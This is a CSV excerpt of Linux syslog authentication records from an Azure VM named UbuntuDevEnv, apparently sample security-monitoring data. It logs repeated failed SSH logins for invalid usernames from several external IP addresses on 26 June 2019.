+352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:40,UbuntuDevEnv,2019-06-26 17:38:40,auth,UbuntuDevEnv,info,Disconnected from invalid user jack 111.230.29.17 port 52562 [preauth],52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,111.230.29.1,52562,,
+353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:44,UbuntuDevEnv,2019-06-26 17:38:44,auth,UbuntuDevEnv,info,Invalid user client1 from 77.237.69.165 port 48836,52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,77.237.69.1,48836,,
+354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:44,UbuntuDevEnv,2019-06-26 17:38:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:44,UbuntuDevEnv,2019-06-26 17:38:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:47,UbuntuDevEnv,2019-06-26 17:38:46,auth,UbuntuDevEnv,info,Failed password for invalid user client1 from 77.237.69.165 port 48836 ssh2,52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,77.237.69.1,48836,,
+357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:47,UbuntuDevEnv,2019-06-26 17:38:46,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 48836:11: Bye Bye [preauth],52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,48836,,
+358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:47,UbuntuDevEnv,2019-06-26 17:38:46,auth,UbuntuDevEnv,info,Disconnected from invalid user client1 77.237.69.165 port 48836 [preauth],52562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,77.237.69.1,48836,,
+359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:01,UbuntuDevEnv,2019-06-26 17:40:01,auth,UbuntuDevEnv,info,Invalid user lucasb from 54.37.66.73 port 53699,52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,54.37.66.7,53699,,
+360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:01,UbuntuDevEnv,2019-06-26 17:40:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:01,UbuntuDevEnv,2019-06-26 17:40:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:04,UbuntuDevEnv,2019-06-26 17:40:03,auth,UbuntuDevEnv,info,Failed password for invalid user lucasb from 54.37.66.73 port 53699 ssh2,52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,54.37.66.7,53699,,
+363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:04,UbuntuDevEnv,2019-06-26 17:40:03,auth,UbuntuDevEnv,info,Disconnected from invalid user lucasb 54.37.66.73 port 53699 [preauth],52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,54.37.66.7,53699,,
+364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:04,UbuntuDevEnv,2019-06-26 17:40:03,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 53699:11: Bye Bye [preauth],52841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,53699,,
+365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:07,UbuntuDevEnv,2019-06-26 17:40:06,auth,UbuntuDevEnv,info,Invalid user amwambogo from 157.230.190.1 port 34692,52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,157.230.190.1,34692,,
+366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:07,UbuntuDevEnv,2019-06-26 17:40:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:07,UbuntuDevEnv,2019-06-26 17:40:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:09,UbuntuDevEnv,2019-06-26 17:40:08,auth,UbuntuDevEnv,info,Failed password for invalid user amwambogo from 157.230.190.1 port 34692 ssh2,52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,157.230.190.1,34692,,
+369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:09,UbuntuDevEnv,2019-06-26 17:40:08,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 34692:11: Bye Bye [preauth],52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,34692,,
+370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:09,UbuntuDevEnv,2019-06-26 17:40:08,auth,UbuntuDevEnv,info,Disconnected from invalid user amwambogo 157.230.190.1 port 34692 [preauth],52864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,157.230.190.1,34692,,
+371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:10,UbuntuDevEnv,2019-06-26 17:40:09,auth,UbuntuDevEnv,info,Invalid user gauthier from 77.237.69.165 port 56025,52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,77.237.69.1,56025,,
+372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:10,UbuntuDevEnv,2019-06-26 17:40:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:10,UbuntuDevEnv,2019-06-26 17:40:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:12,UbuntuDevEnv,2019-06-26 17:40:11,auth,UbuntuDevEnv,info,Failed password for invalid user gauthier from 77.237.69.165 port 56025 ssh2,52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,77.237.69.1,56025,,
+375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:12,UbuntuDevEnv,2019-06-26 17:40:11,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 56025:11: Bye Bye [preauth],52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,56025,,
+376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:12,UbuntuDevEnv,2019-06-26 17:40:11,auth,UbuntuDevEnv,info,Disconnected from invalid user gauthier 77.237.69.165 port 56025 [preauth],52872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,77.237.69.1,56025,,
+377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:14,UbuntuDevEnv,2019-06-26 17:40:14,auth,UbuntuDevEnv,info,Invalid user grafana from 111.230.29.17 port 37710,52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grafana,111.230.29.1,37710,,
+378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:14,UbuntuDevEnv,2019-06-26 17:40:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:14,UbuntuDevEnv,2019-06-26 17:40:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:17,UbuntuDevEnv,2019-06-26 17:40:16,auth,UbuntuDevEnv,info,Failed password for invalid user grafana from 111.230.29.17 port 37710 ssh2,52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grafana,111.230.29.1,37710,,
+381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:17,UbuntuDevEnv,2019-06-26 17:40:17,auth,UbuntuDevEnv,info,Disconnected from invalid user grafana 111.230.29.17 port 37710 [preauth],52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,grafana,111.230.29.1,37710,,
+382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:17,UbuntuDevEnv,2019-06-26 17:40:17,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 37710:11: Bye Bye [preauth],52886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,37710,,
+383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:24,UbuntuDevEnv,2019-06-26 17:40:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:24,UbuntuDevEnv,2019-06-26 17:40:23,auth,UbuntuDevEnv,info,Invalid user bash from 107.175.127.237 port 40170,52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bash,107.175.127.2,40170,,
+385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:24,UbuntuDevEnv,2019-06-26 17:40:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:25,UbuntuDevEnv,2019-06-26 17:40:25,auth,UbuntuDevEnv,info,Failed password for invalid user bash from 107.175.127.237 port 40170 ssh2,52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bash,107.175.127.2,40170,,
+387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:25,UbuntuDevEnv,2019-06-26 17:40:25,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 40170:11: Bye Bye [preauth],52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,40170,,
+388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:40:25,UbuntuDevEnv,2019-06-26 17:40:25,auth,UbuntuDevEnv,info,Disconnected from invalid user bash 107.175.127.237 port 40170 [preauth],52921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bash,107.175.127.2,40170,,
+389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:28,UbuntuDevEnv,2019-06-26 17:41:28,auth,UbuntuDevEnv,info,Invalid user qian from 54.37.66.73 port 34080,53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,54.37.66.7,34080,,
+390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:28,UbuntuDevEnv,2019-06-26 17:41:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:28,UbuntuDevEnv,2019-06-26 17:41:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:30,UbuntuDevEnv,2019-06-26 17:41:29,auth,UbuntuDevEnv,info,Failed password for invalid user qian from 54.37.66.73 port 34080 ssh2,53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,54.37.66.7,34080,,
+393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:30,UbuntuDevEnv,2019-06-26 17:41:30,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 34080:11: Bye Bye [preauth],53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,34080,,
+394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:30,UbuntuDevEnv,2019-06-26 17:41:30,auth,UbuntuDevEnv,info,Disconnected from invalid user qian 54.37.66.73 port 34080 [preauth],53148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,54.37.66.7,34080,,
+395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:34,UbuntuDevEnv,2019-06-26 17:41:34,auth,UbuntuDevEnv,info,Invalid user lucasb from 77.237.69.165 port 34981,53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,77.237.69.1,34981,,
+396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:34,UbuntuDevEnv,2019-06-26 17:41:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:34,UbuntuDevEnv,2019-06-26 17:41:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:37,UbuntuDevEnv,2019-06-26 17:41:37,auth,UbuntuDevEnv,info,Failed password for invalid user lucasb from 77.237.69.165 port 34981 ssh2,53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,77.237.69.1,34981,,
+399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:37,UbuntuDevEnv,2019-06-26 17:41:37,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 34981:11: Bye Bye [preauth],53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,34981,,
+400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:37,UbuntuDevEnv,2019-06-26 17:41:37,auth,UbuntuDevEnv,info,Disconnected from invalid user lucasb 77.237.69.165 port 34981 [preauth],53178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucasb,77.237.69.1,34981,,
+401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:48,UbuntuDevEnv,2019-06-26 17:41:47,auth,UbuntuDevEnv,info,Invalid user vd from 111.230.29.17 port 51088,53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vd,111.230.29.1,51088,,
+402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:48,UbuntuDevEnv,2019-06-26 17:41:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:48,UbuntuDevEnv,2019-06-26 17:41:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:49,UbuntuDevEnv,2019-06-26 17:41:49,auth,UbuntuDevEnv,info,Failed password for invalid user vd from 111.230.29.17 port 51088 ssh2,53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vd,111.230.29.1,51088,,
+405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:50,UbuntuDevEnv,2019-06-26 17:41:49,auth,UbuntuDevEnv,info,Disconnected from invalid user vd 111.230.29.17 port 51088 [preauth],53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vd,111.230.29.1,51088,,
+406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:41:50,UbuntuDevEnv,2019-06-26 17:41:49,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 51088:11: Bye Bye [preauth],53227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,51088,,
+407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:06,UbuntuDevEnv,2019-06-26 17:42:05,auth,UbuntuDevEnv,info,Invalid user qd from 157.230.190.1 port 51258,53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qd,157.230.190.1,51258,,
+408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:06,UbuntuDevEnv,2019-06-26 17:42:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:06,UbuntuDevEnv,2019-06-26 17:42:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:08,UbuntuDevEnv,2019-06-26 17:42:07,auth,UbuntuDevEnv,info,Failed password for invalid user qd from 157.230.190.1 port 51258 ssh2,53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qd,157.230.190.1,51258,,
+411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:08,UbuntuDevEnv,2019-06-26 17:42:07,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 51258:11: Bye Bye [preauth],53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,51258,,
